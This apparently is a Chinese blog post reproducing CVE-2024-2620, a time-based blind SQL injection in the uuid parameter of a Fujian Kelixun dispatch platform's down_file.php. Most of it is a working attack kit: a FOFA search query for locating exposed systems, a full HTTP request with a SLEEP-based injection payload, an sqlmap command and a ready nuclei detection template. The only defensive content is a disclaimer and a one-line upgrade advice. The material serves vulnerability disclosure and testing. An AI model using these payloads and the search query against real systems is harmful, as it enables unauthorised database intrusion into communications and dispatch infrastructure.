CVE-2024-2620漏洞复现（poc）

Administrator 字数: 4624 阅读耗时: 11 分钟 2024/06/24 博客独享热度: 40 评论: 0

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

漏洞名称

福建科立迅通信指挥调度平台down_file.php sql注入漏洞

漏洞影响

福建科立迅通信调度平台 <= 20240318

漏洞描述

福建科立迅通信调度平台 20240318 以及之前版本存在一个严重漏洞，影响了文件 api/client/down_file.php 的一个未知功能。攻击者可以通过操纵参数 uuid 发起 SQL 注入攻击。攻击者可以远程发起攻击。

FOFA搜索语句

body="app/structure/departments.php" || app="指挥调度管理平台"

漏洞复现

向靶场发送如下数据包进行时间盲注

GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

漏洞复现成功

使用sqlmap测试

sqlmap -u "http://x.x.x.x/api/client/down_file.php?uuid=1"

nuclei poc

poc文件内容如下


id: CVE-2024-2620

info:
  name: 福建科力迅通信指挥调度平台down_file.php sql注入漏洞
  author: fgz
  severity: high
  description: '福建科立迅通信调度平台  20240318 以及之前版本存在一个严重漏洞，影响了文件 api/client/down_file.php 的一个未知功能。攻击者可以通过操纵参数 uuid 发起 SQL 注入攻击。攻击者可以远程发起攻击。'
  tags: 2024,sqli
  metadata:
    max-request: 1
    fofa-query: body="app/structure/departments.php" || app="指挥调度管理平台"
    verified: true

requests:
  - raw:
      - |-
        GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: close
        Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
        Upgrade-Insecure-Requests: 1

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && duration>=5 && duration<=6"

修复建议

升级到最新版本。